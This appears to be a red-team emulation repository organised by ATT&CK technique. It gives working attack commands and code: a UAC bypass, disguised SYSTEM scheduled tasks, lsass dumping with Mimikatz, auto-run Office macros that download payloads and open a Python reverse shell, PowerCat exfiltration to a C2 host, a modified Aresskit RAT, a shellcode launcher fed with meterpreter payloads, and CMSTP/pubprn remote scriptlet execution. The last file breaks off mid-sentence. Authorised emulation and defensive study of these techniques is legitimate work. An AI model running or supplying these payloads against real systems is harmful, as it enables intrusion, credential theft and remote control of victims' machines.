├── Techniques ├── T1104 │ └── T1104.md ├── T1216 │ ├── cmd.txt │ ├── shellcode.cs │ └── T1216.md ├── T1186 │ ├── proc_doppel.zip │ └── T1186.md ├── T1223 │ └── T1223.md ├── T1191 │ ├── T1191.inf │ ├── T1191.md │ └── T1191.sct ├── T1192 │ └── T1192.md ├── T1088 │ └── T1088.md ├── T1197 │ └── T1197.md ├── T1053 │ └── T1053.md ├── T1003 │ └── T1003.md ├── T1118 │ └── T1118.md ├── T1155 │ └── T1155.md ├── T1041 │ └── T1041.md ├── T1219 │ ├── T1219.md │ ├── FileHandler.cs │ └── Program.cs ├── T1059 │ └── T1059.md ├── T1086 │ └── T1086.md ├── T1221 │ └── T1221.md └── T1085 │ └── T1085.md ├── README.md └── matrix.md /Techniques/T1104/T1104.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Techniques/T1216/cmd.txt: -------------------------------------------------------------------------------- 1 | code = ""; 2 | o.Run(code); 3 | -------------------------------------------------------------------------------- /Techniques/T1186/proc_doppel.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/brianwrf/RTEmulation/HEAD/Techniques/T1186/proc_doppel.zip -------------------------------------------------------------------------------- /Techniques/T1223/T1223.md: -------------------------------------------------------------------------------- 1 | # Compiled HTML File 2 | 3 | --- 4 | * **ID**: T1223 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | # References 11 | 12 | * 13 | * 14 | -------------------------------------------------------------------------------- /Techniques/T1191/T1191.inf: -------------------------------------------------------------------------------- 1 | [version] 2 | Signature=$chicago$ 3 | AdvancedINF=2.5 4 | 5 | [DefaultInstall_SingleUser] 6 | UnRegisterOCXs=UnRegisterOCXSection 7 | 8 | [UnRegisterOCXSection] 9 | %11%\scrobj.dll,NI,https://github.com/brianwrf/RTEmulation/raw/master/Techniques/T1191/T1191.sct 10 | 11 | [Strings] 12 | AppAct = "SOFTWARE\Microsoft\Connection Manager" 13 | ServiceName="T1191" 14 | ShortSvcName="T1191" 15 | -------------------------------------------------------------------------------- /Techniques/T1192/T1192.md: -------------------------------------------------------------------------------- 1 | # Spearphishing Link 2 | 3 | --- 4 | * **ID**: T1192 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Use 3rd party trusted storage services for malware 11 | * Amazon Cloud Drive: 12 | * Google Drive: 13 | * Dropbox: 14 | * Github: 15 | * Pastebin: 16 | * Mega: 17 | 18 | # References 19 | 20 | * 21 | * 22 | * 23 | -------------------------------------------------------------------------------- /Techniques/T1088/T1088.md: -------------------------------------------------------------------------------- 1 | # Bypass User Account Control 2 | 3 | --- 4 | * **ID**: T1088 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Exploit environment variables in Scheduled Task for User Account Control (UAC) bypass 11 | 12 | ``` 13 | reg add HKCU\Environment /v windir /d "rundll32 %APPDATA%\temp.txt,DllMain " /f&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I & reg delete HKCU\Environment /v windir /f 14 | ``` 15 | 16 | # References 17 | 18 | * 19 | * 20 | * 21 | * 22 | -------------------------------------------------------------------------------- /Techniques/T1197/T1197.md: -------------------------------------------------------------------------------- 1 | # BITS Jobs 2 | 3 | --- 4 | * **ID**: T1197 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## BITSAdmin 11 | Download a payload leveraging BITSAdmin: 12 | ``` 13 | bitsadmin.exe /transfer txt /download /priority normal http://example.com/example.exe %ALLUSERSPROFILE%\example.exe 14 | ``` 15 | 16 | ## PowerShell 17 | Download a payload leveraging PowerShell: 18 | ``` 19 | powershell 20 | Start-BitsTransfer -Priority foreground -Source http://example.com/example.exe -Destination C:\ClientDir\example.exe 21 | ``` 22 | 23 | # References 24 | 25 | * 26 | * 27 | * 28 | * 29 | -------------------------------------------------------------------------------- /Techniques/T1191/T1191.md: -------------------------------------------------------------------------------- 1 | # CMSTP 2 | 3 | --- 4 | * **ID**: T1191 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Execute 11 | Silently installs a specially formatted local .INF (e.g. [`T1191.inf`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1191/T1191.inf)) without creating a desktop icon. The .INF file contains a `UnRegisterOCXSection` section which executes a .SCT (e.g. [`T1191.sct`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1191/T1191.sct)) file using `scrobj.dll`. 12 | ``` 13 | cmstp.exe /ni /ns /s C:\ClientDir\T1191.inf 14 | ``` 15 | * Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. 16 | * Privileges required: User 17 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 18 | 19 | # References 20 | 21 | * 22 | * 23 | * 24 | -------------------------------------------------------------------------------- /Techniques/T1053/T1053.md: -------------------------------------------------------------------------------- 1 | # Scheduled Task 2 | 3 | --- 4 | * **ID**: T1053 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## schtasks 11 | 12 | * Create a scheduled task, e.g. Create a scheduled task run as SYSTEM with highest privilege and no password: 13 | ``` 14 | SCHTASKS /CREATE /SC HOURLY /TN GoogleUpdateTaskMachine /TR "rundll32 %APPDATA%\qwer.txt,DllMain" /NP /RU SYSTEM /RL HIGHEST 15 | SCHTASKS /CREATE /SC DAILY /ST 13:00 /TN \Microsoft\Windows\Feedback\Siuf\DMClientOnScenarioCleanUp /TR "rundll32 %APPDATA%\temp.txt,DllMain" /NP /RU SYSTEM /RL HIGHEST 16 | ``` 17 | 18 | * Run a scheduled task 19 | ``` 20 | schtasks /run /tn GoogleUpdateTaskMachine /I 21 | schtasks /run /tn \Microsoft\Windows\Feedback\Siuf\DMClientOnScenarioCleanUp /I 22 | ``` 23 | 24 | * Delete a scheduled task 25 | ``` 26 | schtasks /delete /tn GoogleUpdateTaskMachine /F 27 | schtasks /delete /tn \Microsoft\Windows\Feedback\Siuf\DMClientOnScenarioCleanUp /F 28 | ``` 29 | 30 | # References 31 | 32 | * 33 | -------------------------------------------------------------------------------- /Techniques/T1003/T1003.md: -------------------------------------------------------------------------------- 1 | # Credential Dumping 2 | 3 | --- 4 | * **ID**: T1003 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## ProcDump and Mimikatz 11 | * Download `ProcDump` to victim host: 12 | ``` 13 | powershell Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile %ALLUSERSPROFILE%\Procdump.zip 14 | ``` 15 | * Decompress `Procdump.zip` on victim host 16 | * Dump process memory of lsass.exe (dump using a clone) on victim host: 17 | ``` 18 | %ALLUSERSPROFILE%\procdump.exe -accepteula -ma lsass.exe lsass.dmp -r 19 | ``` 20 | * Exfiltrate the dump file `lsass.dmp` to attacker host 21 | * Run Mimikatz (x64/mimikatz.exe) on attacker host to grab clear-text passwords: 22 | * Run [Mimikatz](https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20190512/mimikatz_trunk.zip) 23 | * Type `sekurlsa::Minidump lsass.dmp` 24 | * Type `sekurlsa::logonPasswords` 25 | 26 | # References 27 | 28 | * 29 | * 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | It is a repository for Red Team emulation based on MITRE ATT&CK. 4 | 5 | # How to Use 6 | 7 | * See [Matrix](https://github.com/brianwrf/RTEmulation/blob/master/matrix.md) page. 8 | 9 | # How to Contribute 10 | 11 | * Create a subfolder named with technique ID (e.g. [T1053](https://github.com/brianwrf/RTEmulation/tree/master/Techniques/T1053)) under [Techniques](https://github.com/brianwrf/RTEmulation/tree/master/Techniques) folder; 12 | * Create a file named with technique ID (e.g [T1053.md](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1053/T1053.md)) under the subfolder created in last step; 13 | * Add the technique details by using the template as show below in the .md file created in last step: 14 | 15 | ``` 16 | # Technique Name 17 | 18 | --- 19 | * **ID**: T1053 20 | * **Source**: 21 | --- 22 | 23 | # Details 24 | 25 | # References 26 | 27 | * 28 | ``` 29 | 30 | * Update [Matrix](https://github.com/brianwrf/RTEmulation/blob/master/matrix.md) page with the technique name (including the link) under specific tactic. 31 | 32 | # References 33 | * 34 | -------------------------------------------------------------------------------- /Techniques/T1118/T1118.md: -------------------------------------------------------------------------------- 1 | # InstallUtil 2 | 3 | --- 4 | * **ID**: T1118 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Execute 11 | Execute the target .NET DLL or EXE. 12 | ``` 13 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll 14 | ``` 15 | * Usecase: Use to execute code 16 | * Privileges required: User 17 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 18 | 19 | ## Application whitelisting (AWL) bypass 20 | Execute the target .NET DLL or EXE. 21 | ``` 22 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.exe 23 | ``` 24 | * Usecase: Use to bypass application whitelisting 25 | * Privileges required: User 26 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 27 | 28 | ## Create a EXE file for InstallUtil 29 | * See [Remote Access Tools](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/T1219.md) 30 | 31 | # References 32 | 33 | * 34 | * 35 | -------------------------------------------------------------------------------- /Techniques/T1155/T1155.md: -------------------------------------------------------------------------------- 1 | # AppleScript 2 | 3 | --- 4 | * **ID**: T1155 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | * Create a Word document, see [Template Injection](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1221/T1221.md) 11 | * Create a macro in VB with the codes below: 12 | 13 | ``` 14 | Sub Auto_Open() 15 | OpenMe 16 | End Sub 17 | 18 | Sub AutoOpen() 19 | OpenMe 20 | End Sub 21 | 22 | Sub AutoNew() 23 | OpenMe 24 | End Sub 25 | 26 | Sub Document_Open() 27 | OpenMe 28 | End Sub 29 | 30 | Public Function OpenMe() As Variant 31 | On Error Resume Next 32 | Dim cmd As String 33 | cmd = "do shell script ""curl http:///`whoami`/`hostname` & python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\""\"",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' & """ 34 | MacScript (cmd) 35 | End Function 36 | ``` 37 | 38 | # References 39 | 40 | * 41 | * 42 | -------------------------------------------------------------------------------- /Techniques/T1191/T1191.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /Techniques/T1041/T1041.md: -------------------------------------------------------------------------------- 1 | # Exfiltration Over Command and Control Channel 2 | 3 | --- 4 | * **ID**: T1041 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## PowerCat 11 | * Load PowerCat in command line on victim host: 12 | ``` 13 | powershell 14 | IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1') 15 | ``` 16 | * Start a listener on C2 host: 17 | ``` 18 | nc -lvvp > out.file 19 | ``` 20 | * Transfer local files to remote C2 host using `PowerCat`: 21 | ``` 22 | powercat -c -p -i 23 | ``` 24 | 25 | ## RAT 26 | ### Customized Aresskit 27 | * [Deploy](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/T1219.md) customized `aresskit` to victim host 28 | * Transfer local files to C2 host: 29 | * Start a listener on C2 host: 30 | ``` 31 | nc -lvvp > out.file 32 | ``` 33 | * Transfer local files to remote host using `aresskit`: 34 | ``` 35 | aresskit> FileHandler::uploadFileNew 36 | ``` 37 | 38 | # References 39 | 40 | * 41 | * 42 | -------------------------------------------------------------------------------- /Techniques/T1219/T1219.md: -------------------------------------------------------------------------------- 1 | # Remote Access Tools 2 | 3 | --- 4 | * **ID**: T1219 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Customized RAT 11 | ### Create customized Aresskit 12 | * Download the source code from [Github](https://github.com/BlackVikingPro/aresskit) 13 | * Replace with [Program.cs](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/Program.cs) and modify all `` and `` accordingly 14 | * Replace with [FileHandler.cs](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/FileHandler.cs) 15 | * Compile the program using `Debug` - `Any CPU` 16 | * Copy file `aresskit.exe` under folder `.\aresskit\bin\Debug` and upload it to your C2 host 17 | 18 | ### Use customized Aresskit 19 | * Start a listener on C2 host: 20 | ``` 21 | nc -lvvp 22 | ``` 23 | * Download and execute `aresskit.exe` on the victim host by leveraging [`InstallUtil`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1118/T1118.md): 24 | ``` 25 | powershell Invoke-WebRequest -Uri "http:///aresskit.exe" -OutFile %ALLUSERSPROFILE%\aresskit.exe & C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U %ALLUSERSPROFILE%\aresskit.exe 26 | ``` 27 | 28 | # References 29 | 30 | * 31 | * 32 | * 33 | -------------------------------------------------------------------------------- /Techniques/T1216/shellcode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Runtime.InteropServices; 7 | 8 | /* 9 | Author: Casey Smith, Twitter: @subTee 10 | License: BSD 3-Clause 11 | */ 12 | 13 | namespace ShellCodeLauncher 14 | { 15 | public class Program 16 | { 17 | 18 | public void Run(string scode) 19 | { 20 | byte[] shellcode = Convert.FromBase64String(scode); 21 | 22 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 23 | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 24 | Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); 25 | IntPtr hThread = IntPtr.Zero; 26 | UInt32 threadId = 0; 27 | // prepare data 28 | 29 | IntPtr pinfo = IntPtr.Zero; 30 | 31 | // execute native code 32 | 33 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 34 | WaitForSingleObject(hThread, 0xFFFFFFFF); 35 | return; 36 | } 37 | 38 | private static UInt32 MEM_COMMIT = 0x1000; 39 | 40 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 41 | 42 | [DllImport("kernel32")] 43 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, 44 | UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 45 | 46 | 47 | [DllImport("kernel32")] 48 | private static extern IntPtr CreateThread( 49 | 50 | UInt32 lpThreadAttributes, 51 | UInt32 dwStackSize, 52 | UInt32 lpStartAddress, 53 | IntPtr param, 54 | UInt32 dwCreationFlags, 55 | ref UInt32 lpThreadId 56 | 57 | ); 58 | 59 | [DllImport("kernel32")] 60 | private static extern UInt32 WaitForSingleObject( 61 | 62 | IntPtr hHandle, 63 | UInt32 dwMilliseconds 64 | ); 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /Techniques/T1059/T1059.md: -------------------------------------------------------------------------------- 1 | # Command-Line Interface 2 | 3 | --- 4 | * **ID**: T1059 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Common commands in Windows CLI 11 | ### System Information 12 | * Check system info: `systeminfo` 13 | * Check IP info: `ipconfig /all` 14 | * Check current user: `whoami` 15 | * Check host name: `hostname` 16 | * Check local users: `net user` 17 | * Check local groups: `net localgroup` 18 | * Check all the networked devices: `net view` 19 | * Check local shares: `net share` 20 | * Check process info: `tasklist` 21 | 22 | ### File 23 | * Search local files: `cd c:\ & dir /b /s ` 24 | * Check file content: `type ` 25 | * Download a remote file: 26 | * BITSAdmin: `bitsadmin.exe /transfer txt /download /priority normal http://example.com/example.exe %ALLUSERSPROFILE%\example.exe` 27 | * PowerShell: `powershell Invoke-WebRequest -Uri "http://example.com/example.exe" -OutFile %ALLUSERSPROFILE%\example.exe` 28 | 29 | ### Service 30 | * Create a service: `sc create ExampleService binPath= "F:\Delete\SampleSolution\Sample\WindowsServiceExample\bin\Debug\WindowsServiceExample.exe"` 31 | * Start a service: `sc start ExampleService` 32 | * Stop a service: `sc stop ExampleService` 33 | * Delete a service: `sc delete ExampleService` 34 | 35 | ### Scheduled Task 36 | * Create/run/delete a scheduled task: see [Scheduled Task](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1053/T1053.md) 37 | 38 | ### Registry 39 | * Add a registry key: `reg add HKCU\Environment /v windir /d "calc.exe" /f` 40 | * Delete a registry key: `reg delete HKCU\Environment /v windir /f` 41 | 42 | ### Firewall 43 | * Check the status of Windows Firewall: `netsh advfirewall show allprofiles` 44 | * Turn on Windows Firewall: `netsh advfirewall set allprofiles state on` 45 | * Turn off Windows Firewall: `netsh advfirewall set allprofiles state off` 46 | 47 | # References 48 | 49 | * 50 | * 51 | -------------------------------------------------------------------------------- /Techniques/T1086/T1086.md: -------------------------------------------------------------------------------- 1 | # PowerShell 2 | 3 | --- 4 | * **ID**: T1086 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Tools 11 | ### Empire 12 | * Install `Docker` on your C2 host 13 | * Edit `~/.bashrc` to add the following aliases: 14 | ``` 15 | # Empire docker command 16 | alias empire_start='docker exec -it $(docker run -d -p 80:80 empireproject/empire) python2.7 empire' 17 | alias empire_stop='docker kill $(docker ps | grep empire | cut -d " " -f 1)' 18 | ``` 19 | * Run the command below to make the aliases take effect: 20 | ``` 21 | source ~/.bashrc 22 | ``` 23 | * Execute the following commands to start/stop your `Empire` containers: 24 | * Start `Empire` container: `empire_start` 25 | * Stop `Empire` container: `empire_stop` 26 | 27 | ### Invoke-Obfuscation 28 | * Install [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) 29 | * Import module and run it to obfuscate the PowerShell script block as following: 30 | ``` 31 | Import-Module ./Invoke-Obfuscation.psd1 32 | Invoke-Obfuscation 33 | set scriptblock powershell Invoke-WebRequest -Uri "http://example.com/example.dll" -OutFile %ALLUSERSPROFILE%\example.dll;Set-ItemProperty -Path "HKCU:\Environment" -Name 'windir' -Value 'rundll32 %ALLUSERSPROFILE%\example.dll,DllMain ' -Force;schtasks.exe /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I;Remove-ItemProperty -Path "HKCU:\Environment" -Name 'windir' -Force 34 | Encoding\5 35 | Compress\1 36 | Launcher\PS\7 37 | clip 38 | ``` 39 | 40 | ### PowerCat 41 | * See [Exfiltration Over Command and Control Channel](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1041/T1041.md) 42 | 43 | ## Common tips 44 | ### PowerShell Base64 encode 45 | ``` 46 | powershell 47 | $cmd = 'Invoke-WebRequest -Uri "http://example.com/example.exe" -OutFile C:\ClientDir\example.exe'; 48 | $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd); 49 | $encodedCommand = [Convert]::ToBase64String($bytes); 50 | $psh = "powershell -noP -sta -w 1 -enc "+$encodedCommand; 51 | Write-Output $psh 52 | ``` 53 | 54 | # References 55 | 56 | * 57 | * 58 | * 59 | -------------------------------------------------------------------------------- /Techniques/T1221/T1221.md: -------------------------------------------------------------------------------- 1 | # Template Injection 2 | 3 | --- 4 | * **ID**: T1221 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Create a Word template (.dotm) 11 | * Open Word and make the `Developer` tab on the ribbon visible 12 | * Open up the `Visual Basic` editor from `Developer` tab 13 | * Double-click on `ThisDocument` under the current project to open up the code window 14 | * Copy and paste the following macro code into the window 15 | 16 | ``` 17 | Sub Auto_Open() 18 | OpenMe 19 | End Sub 20 | 21 | Sub AutoOpen() 22 | OpenMe 23 | End Sub 24 | 25 | Sub AutoNew() 26 | OpenMe 27 | End Sub 28 | 29 | Sub Document_Open() 30 | OpenMe 31 | End Sub 32 | 33 | Public Function OpenMe() As Variant 34 | On Error Resume Next 35 | Dim hello As String 36 | hello = "cmd.exe /c c:\windows\system32\bitsadmin.exe /transfer txt /download /priority normal http:///dog.png %ALLUSERSPROFILE%\temp.txt® add HKCU\Environment /v windir /d ""rundll32 %ALLUSERSPROFILE%\temp.txt,DllMain "" /f&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I & reg delete HKCU\Environment /v windir /f" 37 | Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") 38 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 39 | Set objConfig = objStartup.SpawnInstance_ 40 | objConfig.ShowWindow = 0 41 | Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") 42 | objProcess.Create hello, Null, objConfig, intProcessID 43 | 44 | Dim cmd As String 45 | cmd = "do shell script ""curl http:///`whoami`/`hostname` & python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\""\"",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' & """ 46 | MacScript (cmd) 47 | End Function 48 | ``` 49 | 50 | * Save the template as `.dotm` format 51 | 52 | ## Create a Word file (.docx) with remote template 53 | * Create a new Word document 54 | * Rename the extension of the document to `.zip` 55 | * Unzip the file 56 | * Navigate to the `.\word\_rels\` folder and open up file `settings.xml.rels` 57 | * Change the `Target` value to be a remote location of template, e.g. `http:///template.dotm` 58 | * Zip the contents back up and rename the file back to a `.docx` file 59 | 60 | # References 61 | 62 | * 63 | * 64 | -------------------------------------------------------------------------------- /Techniques/T1219/FileHandler.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Net; 3 | using System.Net.Sockets; 4 | 5 | 6 | namespace aresskit 7 | { 8 | class FileHandler 9 | { 10 | public static bool downloadFile(string filename, string url) 11 | { 12 | using (WebClient client = new WebClient()) 13 | { 14 | try 15 | { 16 | client.DownloadFile(url, filename); 17 | } 18 | catch (WebException) 19 | { 20 | return false; 21 | } 22 | // File downloaded 23 | return true; 24 | } 25 | } 26 | 27 | public static string uploadFile(string filename, string url) 28 | { 29 | using (WebClient client = new WebClient()) 30 | { 31 | try 32 | { 33 | byte[] responseArray = client.UploadFile(url, filename); 34 | return System.Text.Encoding.ASCII.GetString(responseArray); 35 | } 36 | catch (WebException) 37 | { 38 | return "Upload failed"; 39 | } 40 | // File uploaded 41 | } 42 | } 43 | 44 | public string uploadFileNew(string cmdstr) 45 | { 46 | TcpClient client; 47 | string output = "Please type command as: 'FileHandler::uploadFileNew filename server port'"; 48 | try 49 | { 50 | if (cmdstr == null) 51 | { 52 | return output; 53 | } 54 | else 55 | { 56 | client = new TcpClient(); 57 | string[] paramData = cmdstr.Split(new char[] { ' ' }); 58 | string filename = paramData[0]; 59 | string server = paramData[1]; 60 | int port = Int32.Parse(paramData[2]); 61 | client.Connect(server, port); 62 | 63 | client.Client.SendFile(filename); 64 | client.Client.Shutdown(SocketShutdown.Both); 65 | client.Client.Close(); 66 | } 67 | } 68 | catch (WebException) 69 | { 70 | return output; 71 | } 72 | // File uploaded 73 | return "File uploaded with success!"; 74 | } 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /Techniques/T1186/T1186.md: -------------------------------------------------------------------------------- 1 | # Process Doppelgänging 2 | 3 | --- 4 | * **ID**: T1186 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Execute 11 | * Download PE files from [Github](https://github.com/brianwrf/RTEmulation/raw/master/Techniques/T1186/proc_doppel.zip) 12 | * Unzip `proc_doppel.zip` 13 | * Execute any payload by the following commands: 14 | * For `x86` platform: `proc_doppel32.exe [*target_path], e.g. proc_doppel32.exe mimikatz.exe C:\Windows\system32\notepad.exe` 15 | * For `x64` platform: `proc_doppel64.exe [*target_path], e.g. proc_doppel64.exe mimikatz.exe C:\Windows\system32\notepad.exe` 16 | 17 | ## How to build a PE (x86/x64) for Process Doppelgänging 18 | * Install [Cmake](https://cmake.org/) (3.15.1+) and [Visual Studio](https://visualstudio.microsoft.com/vs/older-downloads/) 2016 or higher (select `Visual C++` option) on Windows 19 | * Download the source code from [Github](https://github.com/hasherezade/process_doppelganging) 20 | * Open cmake-gui 21 | * In `Where is the source code`, enter the path of the project folder where the `CMakeLists.txt` is located, e.g. `C:/Users/test/Downloads/process_doppelganging` 22 | * In `Where to build the binaries`, enter the previous path and add: `/build`, e.g. `C:/Users/test/Downloads/process_doppelganging/build` 23 | * Click on the `Configure` button 24 | * A dialog window asks you if CMake can create the `build` folder, say `yes` 25 | * Another dialog window will ask you to specify a generator for your project, choose `Visual Studio` you installed 26 | * In `Optional platform for generator`, choose proper platform and click on `Finish`: 27 | * For `x86` platform, choose `Win32` 28 | * For `x64` platform, choose `x64` 29 | * CMake may take a few seconds to configure the project 30 | * Click on the `Generate` button to build the Visual Studio project files 31 | * Click on `Open Project` button to open the project in Visual Studio 32 | * Modify the code if you need (optional) 33 | * Set the project in `Release` mode with selected platform (`Win32` or `x64`) and build the PE file under path `./build/Release`, e.g. `C:/Users/test/Downloads/process_doppelganging/build/Release` 34 | 35 | # References 36 | 37 | * 38 | * 39 | * 40 | * 41 | * 42 | * 43 | -------------------------------------------------------------------------------- /matrix.md: -------------------------------------------------------------------------------- 1 | # ATT&CK Tactics & Techniques for Red Team Emulation 2 | | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | 3 | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| 4 | | [Spearphishing Link](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1192/T1192.md) |[AppleScript](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1155/T1155.md) | [BITS Jobs](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1197/T1197.md) | [Scheduled Task](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1053/T1053.md)| [Template Injection](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1221/T1221.md) | [Credential Dumping](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1003/T1003.md) | | [AppleScript](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1155/T1155.md) | | [Exfiltration Over Command and Control Channel](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1041/T1041.md) | [Remote Access Tools](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/T1219.md) | 5 | | |[InstallUtil](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1118/T1118.md) | [Scheduled Task](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1053/T1053.md)| | [Bypass User Account Control](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1088/T1088.md) | | | | | | [Multi-Stage Channels](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1104/T1104.md) | 6 | | |[Rundll32](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1085/T1085.md) | | | [Signed Script Proxy Execution](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1216/T1216.md) | | | | | | | 7 | | |[PowerShell](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1086/T1086.md) | | |[Process Doppelgänging](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1186/T1186.md) | | | | | | | 8 | | |[Command-Line Interface](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1059/T1059.md) | | | [CMSTP](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1191/T1191.md) | | | | | | | 9 | | |[Signed Script Proxy Execution](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1216/T1216.md) | | | [Compiled HTML File](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1223/T1223.md) | | | | | | | 10 | | |[CMSTP](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1191/T1191.md) | | | | | | | | | | 11 | | |[Compiled HTML File](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1223/T1223.md) | | | | | | | | | | 12 | -------------------------------------------------------------------------------- /Techniques/T1216/T1216.md: -------------------------------------------------------------------------------- 1 | # Signed Script Proxy Execution 2 | 3 | --- 4 | * **ID**: T1216 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## pubprn.vbs 11 | ### Execute remote payload in JavaScript 12 | * OS: Windows 7 / Windows 2008 R2 (Version 6.1), Windows 8.1 / Windows 2012 R2 (Version 6.3), Windows 10 / Windows 2016 (Version 1607) 13 | * Methods: 14 | * Option 1: 15 | ``` 16 | C:\Windows\SysWOW64\CScript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http:///payload.sct 17 | ``` 18 | * Option 2: 19 | ``` 20 | C:\Windows\SysWOW64\CScript.exe /b C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http:///payload.sct 21 | ``` 22 | 23 | ### Create payload (.sct) in JavaScript for Meterpreter 24 | 25 | * Compile CSharp source code [`shellcode.cs`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1216/shellcode.cs) to DLL: 26 | ``` 27 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -unsafe -platform:x86 -target:library shellcode.cs 28 | ``` 29 | * Generate a x86 shellcode in base64 format, e.g. meterpreter: 30 | ``` 31 | msfvenom -p windows/meterpreter/reverse_tcp --smallest -a x86 --platform win LHOST= LPORT= -f raw | base64 32 | ``` 33 | * Replace parameter code in 